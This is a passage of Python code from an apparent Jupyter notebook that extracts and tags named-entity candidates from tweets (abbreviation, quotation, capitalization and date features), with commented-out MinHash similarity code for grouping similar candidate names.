updated_phrase=' '.join(wordlist[start:(end+1)])
#print(updated_pos,updated_phrase)
candidate.phraseText=updated_phrase
candidate.position=updated_pos
return candidate
# In[301]:
#candidate: 'frequency','length', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'
def is_float(self,string):
try:
f=float(string)
if(f==0.0):
return True
else:
return ((f) and (string.count(".")==1))
#return True# True if string is a number with a dot
except ValueError: # if string is not a number
return False
def insert_dict(self,candidate,NE_container,candidateBase,tweetID,sentenceID,batch):
key=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
key=(key.lstrip('“‘’”')).rstrip('“‘’”')
key= self.rreplace(self.rreplace(self.rreplace(key,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
try:
if ((key in combined)|(key.isdigit())|(self.is_float(key))):
return
except TypeError:
print(key)
tweetID=str(tweetID)
sentenceID=str(sentenceID)
if key in self.NE_container:
feature_list=self.NE_container[key]
feature_list[0]+=1
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
else:
now = datetime.datetime.now()
now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
feature_list=[0]*17
feature_list[0]+=1
feature_list[1]=candidate.length
#call background process to check for non capitalized occurences
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
feature_list.append(now)
feature_list.append(batch)
self.NE_container[key] = feature_list
#insert in candidateBase
'''if key in candidateBase.keys():
#candidateBase[key]=candidateBase[key]+[str(tweetID)+":"+str(sentenceID)]
if(tweetID in candidateBase[key]):
if(sentenceID in candidateBase[key][tweetID] ):
candidateBase[key][tweetID][sentenceID]=candidateBase[key][tweetID][sentenceID]+1
else:
candidateBase[key][tweetID][sentenceID]=1
else:
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1
#c=[(y,str(idx)) for idx,y in enumerate( a) if y not in b]
#candidateBase[key]
else:
#candidateBase[key]=[str(tweetID)+":"+str(sentenceID)]
candidateBase[key]={}
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1'''
return
# In[302]:
def printList(self,mylist):
print("["),
#print "[",
for item in mylist:
if item != None:
if isinstance(item,ne.NE_candidate):
item.print_obj()
#print (item.phraseText)
else:
print (item+",", end="")
#print item+",",
#print "]"
print("]")
return
# In[303]:
# In[304]:
def consecutive_cap(self,tweetWordList_cappos,tweetWordList):
output=[]
#identifies consecutive numbers in the sequence
#print(tweetWordList_cappos)
for k, g in groupby(enumerate(tweetWordList_cappos), lambda element: element[0]-element[1]):
output.append(list(map(itemgetter(1), g)))
count=0
if output:
final_output=[output[0]]
for first, second in (zip(output,output[1:])):
#print(first,second)
#print(tweetWordList[first[-1]])
if ((not (tweetWordList[first[-1]]).endswith('"'))&((second[0]-first[-1])==2) & (tweetWordList[first[-1]+1].lower() in prep_list)):
(final_output[-1]).extend([first[-1]+1]+second)
elif((not (tweetWordList[first[-1]].endswith('"')))&((second[0]-first[-1])==3) & (tweetWordList[first[-1]+1].lower() in prep_list)& (tweetWordList[first[-1]+2].lower() in article_list)):
(final_output[-1]).extend([first[-1]+1]+[first[-1]+2]+second)
else:
final_output.append(second)
#merge_positions.append(False)
else:
final_output=[]
return final_output
# In[305]:
#basically splitting the original NE_candidate text and building individual object from each text snippet
def build_custom_NE(self,phrase,pos,prototype,feature_index,feature_value):
#print("Enters")
position=pos
custom_NE= ne.NE_candidate(phrase,position)
for i in range(15):
custom_NE.set_feature(i,prototype.features[i])
custom_NE.set_feature(feature_index,feature_value)
if (feature_index== ne.is_csl) & (feature_value== True):
custom_NE.set_feature(ne.start_of_sentence, False)
custom_NE=self.entity_info_check(custom_NE)
return custom_NE
# In[306]:
def abbrv_algo(self,ne_element):
'''abbreviation algorithm
trailing apostrophe:
|period:
| multiple letter-period sequence:
| all caps
| non period:
| ?/! else drop apostrophe
else:
unchanged
'''
phrase= ne_element.phraseText
#print("=>"+phrase)
#since no further split occurs we can set remaining features now
ne_element.set_feature(ne.capitalized, True)
if ne_element.phraseText.isupper():
ne_element.set_feature(ne.all_capitalized, True)
else:
ne_element.set_feature(ne.all_capitalized, False)
abbreviation_flag=False
p=re.compile(r'[^a-zA-Z\d\s]$')
match_list = p.findall(phrase)
if len(match_list)>0:
#print("Here")
if phrase.endswith('.'):
#print("Here")
p1= re.compile(r'([a-zA-Z][\.]\s*)')
match_list = p1.findall(phrase)
if ((len(match_list)>1) & (len(phrase)<6)):
#print ("1. Found abbreviation: "+phrase)
abbreviation_flag= True
else:
if (phrase[-2]!=' '):
phrase= phrase[:-1]
else:
#if phrase.endswith(string.punctuation):
if (phrase[-2]!=' '):
phrase= phrase[:-1]
#if not (phrase.endswith('?')|phrase.endswith('!')|phrase.endswith(')')|phrase.endswith('>')):
#phrase= phrase[:-1]
else:
p2=re.compile(r'([^a-zA-Z0-9_\s])')
match_list = p2.findall(phrase)
if ((len(match_list)==0) & (phrase.isupper()) & (len(phrase)<7)& (len(phrase)>1)):
#print ("2. Found abbreviation!!: "+phrase)
abbreviation_flag= True
else:
#print("Here-> "+phrase)
p3= re.compile(r'([A-Z][.][A-Z])')
p4= re.compile(r'\s')
match_list = p3.findall(phrase)
match_list1 = p4.findall(phrase)
if ((len(match_list)>0) & (len(match_list1)==0)):
abbreviation_flag= True
#print ("3. Found abbreviation!!: "+phrase)
#element= ne.NE_candidate(phrase.strip())
ne_element.phraseText=phrase
ne_element.reset_length()
ne_element.set_feature(ne.abbreviation, abbreviation_flag)
return ne_element
# In[307]:
def punct_clause(self,NE_phrase_in):
NE_phrases=self.entity_info_check(NE_phrase_in)
cap_phrases=NE_phrases.phraseText.strip()
final_lst=[]
#print (cap_phrases,NE_phrases.features[ne.date_indicator])
if (re.compile(r'[^a-zA-Z0-9_\s]')).findall(cap_phrases):
#case of intermediate punctuations: handles abbreviations
p1= re.compile(r'(?:[a-zA-Z0-9][^a-zA-Z0-9_\s]\s*)')
match_lst = p1.findall(cap_phrases)
#print(match_lst)
if match_lst:
index= (list( p1.finditer(cap_phrases) )[-1]).span()[1]
p= re.compile(r'[^a-zA-Z\d\s]')
match_list = p.findall(cap_phrases)
p2=re.compile(r'[^a-zA-Z\d\s]$') #ends with punctuation
if ((len(match_list)>0)&(len(match_lst)>0)&((len(match_list)-len(match_lst))>0)):
if (p2.findall(cap_phrases)):
#only strips trailing punctuations, not intermediate ones following letters
cap_phrases = cap_phrases[0:index]+re.sub(p, '', cap_phrases[index:])
NE_phrases.phraseText= cap_phrases
#comma separated NEs
#lst=filter(lambda(word): word!="", re.split('[,]', cap_phrases))
#print ("=>"+ cap_phrases)
start_of_sentence_fix=NE_phrases.features[ne.start_of_sentence]
#temp=re.split("\...", cap_phrases)
#inter=self.flatten(list(map(lambda elem: re.split('[,:!…]',elem),temp)),[])
#print("'''",inter)
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
splitList=re.split('["‘’“”()/,;:!?…]',cap_phrases)
splitList=list(filter(lambda word: ((word!="")&(word.lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined)), splitList))
#print("==",splitList)
wordlstU=list(map(lambda word: word.strip().strip(string.punctuation), splitList))
wordlstU=list(filter(lambda word: word!="", wordlstU))
wordlst=list(filter(lambda word: ((word.strip().strip(string.punctuation))[0].isupper()|(word.strip().strip(string.punctuation))[0].isdigit()), wordlstU))
#print(":::",wordlst)
if ((NE_phrases.features[ne.date_indicator]==False)):
#print("hehe")
if(len(splitList)>1):
if(len(wordlst)>0):
#print("here::")
pos=NE_phrases.position
combined=[]
prev=0
for i in range(len(wordlst)):
word=wordlst[i]
word_len=len(list(filter(lambda individual_word: individual_word!="", re.split('[ ]', word))))
word_pos=pos[(prev):(prev+word_len)]
prev=prev+word_len
combined+=[[word]+word_pos]
lst_nsw=list(filter(lambda element: (((str(element[0])).strip(string.punctuation).lower() not in combined)& (not (str(element[0])).strip(string.punctuation).isdigit()) & (len(str(element[0]))>1)) ,combined))
#print ("++",lst_nsw)
if(lst_nsw):
final_lst= list(map(lambda element:self.build_custom_NE(str(element[0]),element[1:],NE_phrases,ne.is_csl,True), lst_nsw))
final_lst[0].set_feature(ne.start_of_sentence, NE_phrases.features[ne.start_of_sentence])
else:
final_lst=[]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
#check abbreviation
#print("++",final_lst)
if(final_lst):
final_lst= list(map(lambda phrase: self.abbrv_algo(phrase), final_lst))
#print(lst)
return final_lst
# In[308]:
#%%timeit -o
def f(self,y,sflag,quoteFlag,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#print(sflag)
if sflag:
left=""
right=""
lp=(-1)
rp=(-1)
i=0
j=len(y)-1
flag1=False
flag2=False
x=[]
while (((flag1==False)|(flag2==False))&((j-i)>0)):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(flag1,flag2)
#if((flag1==False)|(flag2==False)):
# while (((j-i)!=0)|((flag1==False)|(flag2==False))):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print(left)
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(lp,rp)
if(lp==rp):
if(lp!=-1):
x=[y[lp]]
else:
x=y[lp:(rp+1)]
else:
x=y
#print(x)
if(x):
list1=list(map(lambda word: tweetWordList[word], x))
phrase=" ".join(e for e in list1)
#print(phrase)
phrase1="".join(list1)
#if not ((phrase[0].isdigit()) & (len(x)==1)):
if not (phrase1.strip().isdigit()):
NE_phrase= ne.NE_candidate(phrase.strip(),x)
if 0 in x:
NE_phrase.set_feature(ne.start_of_sentence,True)
else:
NE_phrase.set_feature(ne.start_of_sentence,False)
NE_phrase.set_feature(ne.is_quoted,quoteFlag)
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
#print("====>>",NE_phrase.phraseText)
return NE_phrase
# In[309]:
def capCheck(self,word):
combined_list=[]+cachedStopWords+prep_list+chat_word_list+article_list
if word.startswith('@'):
return False
elif "<Hashtag" in word:
return False
#elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower() in combined_list:
elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)) in combined_list:
# if((word=="The")|(word=="THE")):
# return True
# else:
return True
elif word[0].isdigit():
return True
else:
p=re.compile(r'^[\W]*[A-Z]')
l= p.match(word)
if l:
return True
else:
return False
# In[310]:
def title_check(self,ne_phrase):
title_flag=False
words=ne_phrase.phraseText.split()
for word in words:
if word.lower() in cachedTitles:
title_flag= True
break
ne_phrase.set_feature(ne.title,title_flag)
return ne_phrase
# In[311]:
def entity_info_check(self,ne_phrase):
flag1=False #has number
flag3=False
flag_ind=[] #is number
month_ind=[]
date_num_holder=[]
words=ne_phrase.phraseText.split()
for word in words:
word=(word.strip()).rstrip(string.punctuation).lower()
punct_flag=False
for char in word:
if ((char in string.punctuation)|(char in ['“','‘','’','”','…'])):
punct_flag=True
break
#if ((not word.isalpha())& (not "'s" in word) & (not "’s" in word)):'‘“"’”
if ((not word.isalpha())& (not punct_flag)):
flag_ind+=[True]
if word.isdigit():
date_num_holder+=['num']
else:
date_num_holder+=['alpha']
else:
flag_ind+=[False]
if word in month_list:
month_ind+=[True]
date_num_holder+=['month']
elif word in day_list:
date_num_holder+=['day']
elif word in prep_list:
date_num_holder+=['preposition']
elif word in article_list:
date_num_holder+=['article']
else:
#print("=>"+word)
date_num_holder+=['string']
if True in flag_ind:
flag1=True
if True in month_ind:
flag3=True
ne_phrase.set_feature(ne.has_number,flag1)
ne_phrase.set_feature(ne.date_indicator,flag3)
ne_phrase.set_date_num_holder(date_num_holder)
return ne_phrase
# In[312]:
#removing commonly used expletives, enunciated chat words and other common words (like days of the week, common expressions)
def slang_remove(self,ne_phrase):
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
p1= re.compile(r'([A-Za-z]+)\1\1{1,}')
match_lst = p1.findall(phrase)
if phrase in article_list:
return True
elif phrase in day_list:
return True
#elif phrase in month_list:
#return True
elif match_lst:
return True
else:
return False
# In[313]:
def apostrope_check(self,ne_phrase):
apostrophe="'s"
bad_apostrophe="’s"
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
if (apostrophe in phrase):
if (phrase.endswith(apostrophe)):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(apostrophe))
elif (bad_apostrophe in phrase):
if phrase.endswith(bad_apostrophe):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(bad_apostrophe))
else:
ne_phrase.set_feature(ne.is_apostrophed,-1)
return ne_phrase
# In[314]:
def punctuation_check(self,ne_phrase):
holder=[]
punctuation_holder=[]
flag_holder=[]
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
for i in range(len(phrase)):
if (phrase[i] in string.punctuation):
holder+=[i]
for i in holder:
if ((i<(len(phrase)-1)) & (phrase[i]=="'") & (phrase[i+1]=="s")):
flag_holder+=[False]
elif ((i==(len(phrase)-1)) & (phrase[i]=="'")):
flag_holder+=[False]
else:
flag_holder+=[True]
punctuation_holder+=[i]
#print(flag_holder)
ne_phrase.set_punctuation_holder(punctuation_holder)
if True in flag_holder:
ne_phrase.set_feature(ne.has_intermediate_punctuation,True)
else:
ne_phrase.set_feature(ne.has_intermediate_punctuation,False)
return ne_phrase
# In[315]:
def tense_check(self,ne_phrase):
words=(((ne_phrase.phraseText.strip()).rstrip(string.punctuation)).lower()).split()
verb_flag=False
adverb_flag=False
if (len(words)==1):
if words[0].endswith("ing"):
verb_flag=True
if words[0].endswith("ly"):
adverb_flag=True
ne_phrase.set_feature(ne.ends_like_verb,verb_flag)
ne_phrase.set_feature(ne.ends_like_adverb,adverb_flag)
return ne_phrase
# In[316]:
def capitalization_change(self,ne_element):
phrase=((ne_element.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()
val=-1
topic_indicator=False
p1= re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+[A-Za-z]+') #BREAKING: Toronto Raptors
p2= re.compile(r'([A-Z]{1}[a-z]+)+[^A-Za-z]*\s+[A-Z]{4,}') #The DREAMIEST LAND
match_lst1 = p1.findall(phrase)
match_lst2 = p2.findall(phrase)
if (match_lst1):
if not phrase.isupper():
p3=re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+')
val=list(p3.finditer(phrase))[-1].span()[1]
if(":" in phrase):
topic_indicator=True
ne_element.set_feature(ne.change_in_capitalization,val)
elif (match_lst2):
#print ("GOTIT2: "+phrase)
p3=re.compile(r'([A-Z]{1}[a-z]+)+')
val=list(p3.finditer(phrase))[-1].span()[1]
ne_element.set_feature(ne.change_in_capitalization,val)
else:
ne_element.set_feature(ne.change_in_capitalization,val)
ne_element.set_feature(ne.has_topic_indicator,topic_indicator)
return ne_element
def quoteProcess(self,unitQuoted, tweetWordList):
candidateString=""
retList=[]
matches=[]
quoteMatch=[]
final=[]
flag=False
#print(tweetWordList)
list1=list(map(lambda index: tweetWordList[index], unitQuoted))
candidateString=" ".join(list1)
#print("=>",candidateString)
# candidateString=""
# for index in range(len(unitQuoted)-1):
# candidateString+=tweetWordList[unitQuoted[index]]+" "
# candidateString+=tweetWordList[unitQuoted[-1]]
# print("=>",candidateString)
flagOne=False
flagTwo=False
flagThree=False
flagFour=False
p= re.compile(r'[^\S]*([\'].*?[\'])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\'].*?[\'])[^\s]*')
p2=re.compile(r'[^\s]*([\'].*?[\'])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagOne=True
if(not flagOne):
p= re.compile(r'[^\S]*([‘].*?[’])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([‘].*?[’])[^\s]*')
p2=re.compile(r'[^\s]*([‘].*?[’])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagTwo=True
if((not flagOne)&(not flagTwo)):
p= re.compile(r'[^\S]*([“].*?[”])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([“].*?[”])[^\s]*')
p2=re.compile(r'[^\s]*([“].*?[”])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagThree=True
if((not flagOne)&(not flagTwo)&(not flagThree)):
p= re.compile(r'[^\S]*([\"].*?[\"])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\"].*?[\"])[^\s]*')
p2=re.compile(r'[^\s]*([\"].*?[\"])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagFour=True
if (flagOne|flagTwo|flagThree|flagFour):
flag=True
for index in indices:
span= list(index.span())
#print(span[0])
quoteMatch.append([int(span[0]),int(span[1])])
matches+=[int(span[0]),int(span[1])]
#print(matches)
final+=[(candidateString[0:matches[0]],False)]
for i in range(len(matches)-1):
if([matches[i],matches[i+1]] in quoteMatch):
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),True)]
else:
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),False)]
final+=[(candidateString[matches[-1]:],False)]
final=list(filter(lambda strin: strin[0]!="",final))
final=list(map(lambda strin: (strin[0].strip(),strin[1]),final))
#print(final)
for unit in final:
lst=[]
unitsplit=list(filter(lambda unitString: unitString!='',unit[0].split()))
for splitunit in unitsplit:
lst+=[tweetWordList.index(splitunit,unitQuoted[0])]
retList+=[(lst,unit[1])]
else:
retList+=[(unitQuoted,False)]
#print(retList)
return retList
# In[318]:
def trueEntity_process(self,tweetWordList_cappos,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#returns list with position of consecutively capitalized words
#print(tweetWordList_cappos, tweetWordList)
output_unfiltered = self.consecutive_cap(tweetWordList_cappos,tweetWordList)
#print("==>",output_unfiltered)
#splitting at quoted units
output_quoteProcessed=[]
start_quote=[]
end_quote=[]
for unitQuoted in output_unfiltered:
unitout=self.quoteProcess(unitQuoted, tweetWordList)
#print("==>",unitout)
for elem in unitout:
mod_out=[]
out=elem[0]
flag=elem[1]
sflag=False
# '’”"
#print(out,flag)
if not (flag):
#for id in range(len(out)):
temp=[]
#print("::",out)
for index in out:
#print(index,tweetWordList[index])
word=(((tweetWordList[index].strip().strip('"“‘’”"')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print("=>"+word)"“‘’”"
if (word):
if (word in combined):
if(len(out)==1):
temp.append(index)
else:
if (word not in prep_list)&(word not in article_list):
temp.append(index)
else:
sflag=True
#else:
#if ((index==0)||()):
#temp.append(index)
# else:
# print("here")
# else:
# print("here")
#print(temp)
for elem in temp:
out.remove(elem)
#out[id]=temp
lst=[]
for k, g in groupby(enumerate(out), lambda elem: elem[1]-elem[0]):
lst=list(map(itemgetter(1), g))
#print("==>",lst)
if(lst):
mod_out.append((lst,sflag,flag))
#print('==>',mod_out)
else:
mod_out=[(out,sflag,flag)]
#print(mod_out)
#print(mod_out)
if(mod_out):
output_quoteProcessed.extend(mod_out)
#'cgl\print("=====>",output_quoteProcessed)
output= list(filter(lambda element: ((element[0]!=[0])&(element[0]!=[])), output_quoteProcessed))
#print(output)
#consecutive capitalized phrases
consecutive_cap_phrases1=list(map(lambda x: self.f(x[0],x[1],x[2],tweetWordList), output))
consecutive_cap_phrases=list(filter(lambda candidate:(candidate.phraseText!="JUST_DIGIT_ERROR"),consecutive_cap_phrases1))
#self.printList(consecutive_cap_phrases)
#implement the punctuation clause
ne_List_pc=self.flatten(list(map(lambda NE_phrase: self.punct_clause(NE_phrase), consecutive_cap_phrases)),[])
#self.printList(ne_List_pc)
#stopword removal and start-of-sentence
ne_List_pc_sr= list(map(lambda candidate: self.stopwordReplace(candidate), ne_List_pc))
#self.printList(ne_List_pc_sr)
ne_List_pc_checked= list(filter(lambda candidate: ((candidate.phraseText!="")&(candidate.position!=[0])), ne_List_pc_sr))
#implement title detection
#ne_List_titleCheck= list(map(lambda element: self.title_check(element), ne_List_pc_checked))
#implement slang check and remove
ne_List_slangCheck= list(filter(lambda element: not self.slang_remove(element), ne_List_pc_checked))
#implement apostrophe, tense and punctuation marker with final number check
#ne_List_apostropeCheck= list(map(lambda element: self.apostrope_check(element), ne_List_slangCheck))
#ne_List_punctuationCheck= list(map(lambda element: self.punctuation_check(element), ne_List_apostropeCheck))
ne_List_numCheck=list(filter(lambda candidate: not (candidate.phraseText.lstrip(string.punctuation).rstrip(string.punctuation).strip()).isdigit(), ne_List_slangCheck))
#ne_List_tenseCheck= list(map(lambda element: self.tense_check(element), ne_List_numCheck))
#tracking sudden change in capitalization pattern
#ne_List_capPatCheck= list(map(lambda element: self.capitalization_change(element), ne_List_tenseCheck))
#check on length
ne_List_lengthCheck= list(filter(lambda element: element.length<7, ne_List_numCheck))
ne_List_badWordCheck= list(filter(lambda element:((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”').lower()) not in combined, ne_List_lengthCheck))
ne_List_allCheck= list(filter(lambda element:(len((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”'))>1),ne_List_badWordCheck))
#ne_List_allCheck= list(filter(lambda element: (element.phraseText.lower() not in combined), ne_List_double_Check))
#q.put(ne_List_allCheck)
return ne_List_allCheck
#return ne_List_allCheck
# In[319]:
'''This is the main module. I am not explicitly writing it as a function as I am not sure what argument you are
passing.However you can call this whole cell as a function and it will call the rest of the functions in my module
to extract candidates and features
'''
'''#reads input from the database file and converts to a dataframe. You can change this part accordingly and
#directly convert argument tuple to the dataframe'''
#Inputs: Collection.csv 500Sample.csv 3.2KSample.csv eric_trump.csv
#df_out.to_csv('TweetBase500.csv')
#--------------------------------------PHASE I---------------------------------------------------
# In[ ]:
#--------------------------------------PHASE II---------------------------------------------------
'''set1 = set(['Melania','Trump'])
set2 = set(['Donald','Trump'])
set3 = set(['Jared','Kushner'])
m1 = MinHash(num_perm=200)
m2 = MinHash(num_perm=200)
m3 = MinHash(num_perm=200)
for d in set1:
m1.update(d.encode('utf8'))
for d in set2:
m2.update(d.encode('utf8'))
for d in set3:
m3.update(d.encode('utf8'))
# Create LSH index
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
lsh.insert("m3", m3)
result = lsh.query(m1)
print("Approximate neighbours with Jaccard similarity", result)
candidates=["donald trump","melania trump", "obama","barack obama","barack"]
listofMinhash=[]
m=MinHash(num_perm=200)
candidate0=set(candidates[0].split())
for d in candidate0:
m.update(d.encode('utf8'))
listofMinhash.append(m)
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
for candidate in candidates[1:]:'''
# In[ ]:
'''
print ("Shingling articles...")
# The current shingle ID value to assign to the next new shingle we
# encounter. When a shingle gets added to the dictionary, we'll increment this
# value.
curShingleID = 0
# Create a dictionary of the articles, mapping the article identifier (e.g.,
# "t8470") to the list of shingle IDs that appear in the document.
candidatesAsShingleSets = {};
candidateNames = []
t0 = time.time()
totalShingles = 0
for k in range(0, len(sorted_NE_container.keys())):
# Read all of the words (they are all on one line) and split them by white space.
words = list(sorted_NE_container.keys())[k].split(" ")
# Retrieve the article ID, which is the first word on the line.
candidateID = k
# Maintain a list of all document IDs.
candidateNames.append(candidateID)
# 'shinglesInDoc' will hold all of the unique shingle IDs present in the current document.
#If a shingle ID occurs multiple times in the document,
# it will only appear once in the set (this is a property of Python sets).
shinglesInCandidate = set()
# For each word in the document...
for index in range(0, len(words)):
# Construct the shingle text by combining three words together.
shingle = words[index]
# Hash the shingle to a 32-bit integer.
#crc = binascii.crc32("")
crc = binascii.crc32(bytes(shingle, encoding="UTF-8")) & (0xffffffff)
# Add the hash value to the list of shingles for the current document.
# Note that set objects will only add the value to the set if the set
# doesn't already contain it.
shinglesInCandidate.add(crc)
# Store the completed list of shingles for this document in the dictionary.
#print(str(words)+": ")
#for i in shinglesInCandidate:
# print('0x%08x' %i)
candidatesAsShingleSets[candidateID] = shinglesInCandidate
# Count the number of shingles across all documents.
totalShingles = totalShingles + (len(words))
# Report how long shingling took.
print ('\nShingling ' + str(str(len(sorted_NE_container.keys()))) + ' candidates took %.2f sec.' % (time.time() - t0))
print ('\nAverage shingles per doc: %.2f' % (totalShingles / len(sorted_NE_container.keys())))
'''
# In[ ]:
'''
# =============================================================================
# Generate MinHash Signatures
# =============================================================================
numHashes=20
numCandidates=len(sorted_NE_container.keys())
# Time this step.
t0 = time.time()
print ('Generating random hash functions...')
# Record the maximum shingle ID that we assigned.
maxShingleID = 2**32-1
nextPrime = 4294967311
# Our random hash function will take the form of:
# h(x) = (a*x + b) % c
# Where 'x' is the input value, 'a' and 'b' are random coefficients, and 'c' is
# a prime number just greater than maxShingleID.
# Generate a list of 'k' random coefficients for the random hash functions,
# while ensuring that the same value does not appear multiple times in the
# list.
def pickRandomCoeffs(k):
# Create a list of 'k' random values.
randList = []
while k > 0:
# Get a random shingle ID.
randIndex = random.randint(0, maxShingleID)
# Ensure that each random number is unique.
while randIndex in randList:
randIndex = random.randint(0, maxShingleID)
# Add the random number to the list.
randList.append(randIndex)
k = k - 1
return randList
# For each of the 'numHashes' hash functions, generate a different coefficient 'a' and 'b'.
coeffA = pickRandomCoeffs(numHashes)
coeffB = pickRandomCoeffs(numHashes)
print ('\nGenerating MinHash signatures for all candidates...')
# List of documents represented as signature vectors
signatures =np.ndarray(shape=(20, numCandidates))
# Rather than generating a random permutation of all possible shingles,
# we'll just hash the IDs of the shingles that are *actually in the document*,
# then take the lowest resulting hash code value. This corresponds to the index
# of the first shingle that you would have encountered in the random order.
# For each document...
for candidateID in candidateNames:
# Get the shingle set for this document.
shingleIDSet = candidatesAsShingleSets[candidateID]
# The resulting minhash signature for this document.
signature = []
# For each of the random hash functions...
for i in range(0, numHashes):
# For each of the shingles actually in the document, calculate its hash code
# using hash function 'i'.
# Track the lowest hash ID seen. Initialize 'minHashCode' to be greater than
# the maximum possible value output by the hash.
minHashCode = nextPrime + 1
# For each shingle in the document...
for shingleID in shingleIDSet:
# Evaluate the hash function.
hashCode = (coeffA[i] * shingleID + coeffB[i]) % nextPrime
# Track the lowest hash code seen.
if hashCode < minHashCode:
minHashCode = hashCode
# Add the smallest hash code value as component number 'i' of the signature.
signature.append(minHashCode)
# Store the MinHash signature for this document.
#signatures.append(signature)
signatures[:,candidateID]=signature
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print(list(np.shape(signatures)))
print ("\nGenerating MinHash signatures took %.2fsec" % elapsed)
#print ('\nsignatures stored in a numpy array...')
# Creates a N x N matrix initialized to 0.
# Time this step.
t0 = time.time()
# For each of the test documents...
for i in range(10, 11):
#for i in range(0, numCandidates):
print(list(sorted_NE_container.keys())[i]+": ",end="")
# Get the MinHash signature for document i.
signature1 = signatures[i]
# For each of the other test documents...
for j in range(0, numCandidates):
if(j!=i):
# Get the MinHash signature for document j.
signature2 = signatures[j]
count = 0
# Count the number of positions in the minhash signature which are equal.
for k in range(0, numHashes):
count = count + (signature1[k] == signature2[k])
# Record the percentage of positions which matched.
estJSim= (count / numHashes)
#print(estJSim)
if (estJSim>=0.5):
print("=>"+list(sorted_NE_container.keys())[j]+", ",end="")
print()
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print ("\nComparing MinHash signatures took %.2fsec" % elapsed)'''
# In[ ]:
'''cap_phrases="Trump:Russia,Afgha"
words=re.split('[,:]', cap_phrases)
print(words)
candidateString='"BS'
p= re.compile(r'(".*?")[^\s]*[\s]*')
indices= (list( p.finditer(candidateString) ))
matches=[]
final=[]
if(indices):
for index in indices:
span= list(index.span())
#print(span[0])
matches+=[int(span[0]),int(span[1])]
print(matches)
final+=[candidateString[0:matches[0]]]
for i in range(len(matches)-1):
